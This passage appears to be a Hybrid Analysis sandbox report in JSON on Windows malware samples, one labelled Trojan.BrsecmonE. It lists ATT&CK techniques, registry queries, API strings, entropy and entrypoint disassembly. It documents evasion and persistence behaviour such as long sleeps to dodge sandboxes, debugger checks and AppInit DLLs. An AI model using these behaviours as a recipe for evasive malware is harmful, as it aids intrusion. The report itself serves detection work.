\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"12F1FA49CE2F2FD19DB6147E547A35625C260B2FEC2ECF67DE89C837990C5D94\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 70200000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00003088)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003088)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has resource with unusual entropy \"CORJC:7.836543055154563\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"FlsAlloc\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"GetActiveWindow\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: USER32.DLL)\n Found string \"GetDateFormatEx\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNEL32.DLL)\n Found string \"GetEnabledXStateFeatures\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNEL32.DLL)\n Found string \"GetLastActivePopup\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: USER32.DLL)\n Found string \"GetLocaleInfoEx\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"GetProcessWindowStation\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: USER32.DLL)\n Found string \"GetTimeFormatEx\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNEL32.DLL)\n Found string \"GetUserDefaultLocaleName\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"GetUserObjectInformationW\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: USER32.DLL)\n Found string \"GetXStateFeaturesMask\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNEL32.DLL)\n Found string \"IsValidLocaleName\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"LCIDToLocaleName\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"LocaleNameToLCID\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)\n Found string \"LocateXStateFeature\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNEL32.DLL)\n Found string \"MessageBoxW\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: USER32.DLL)\n Found string \"SetThreadStackGuarantee\" (Source: 12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94, API is part of module: KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-98", "relevance": 5, "name": "PE files contains large number of export functions (more than 100)", "description": "12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94 contains more than 100 export function", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has section name .text with entropy \"6.629866510989693\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has section name .rsrc with entropy \"7.815494487737149\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has section name .reloc with entropy \"6.632998725084581\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" sleeping for \"1097794852\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" opens a process \"C:\\12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (UID: 00000000-00003088)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62
https://hybrid-analysis.com/sample/a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62
Hybrid Analysis - Um_unhooking
{"size": 7274496, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62", "sha256": "a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62", "av_detect": 79, "vx_family": "Trojan.BrsecmonE", "threat_score": 50, "threat_level": 2, "verdict": "malicious", "total_signatures": 41, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-78", "relevance": 1, "name": "Contains export functions", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" contains export function called \"_ExportFuncs@4\" at ordinal 1", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-7", "type": 2, "relevance": 1, "name": "Contains PDB pathways", "description": "\"C:\\givodiz61-fiwexihecekaja.pdb\"\n \"\\crypt\\tmp_1593493797\\bin\\muhurarel.pdb\"", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegisterEventSourceW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"HeapSize\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"InitializeCriticalSectionAndSpinCount\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetShortPathNameW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetConsoleCP\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"IsDebuggerPresent\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"TlsAlloc\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"IsProcessorFeaturePresent\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"AddConsoleAliasA\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetConsoleMode\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"WriteConsoleW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"GetCommandLineW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"a05546c4b43f4ee25e74acc3de8202a956f4d44557c1c0ac2b4b8c0ef0b60f62\")\n Found reference to API (Indicator: 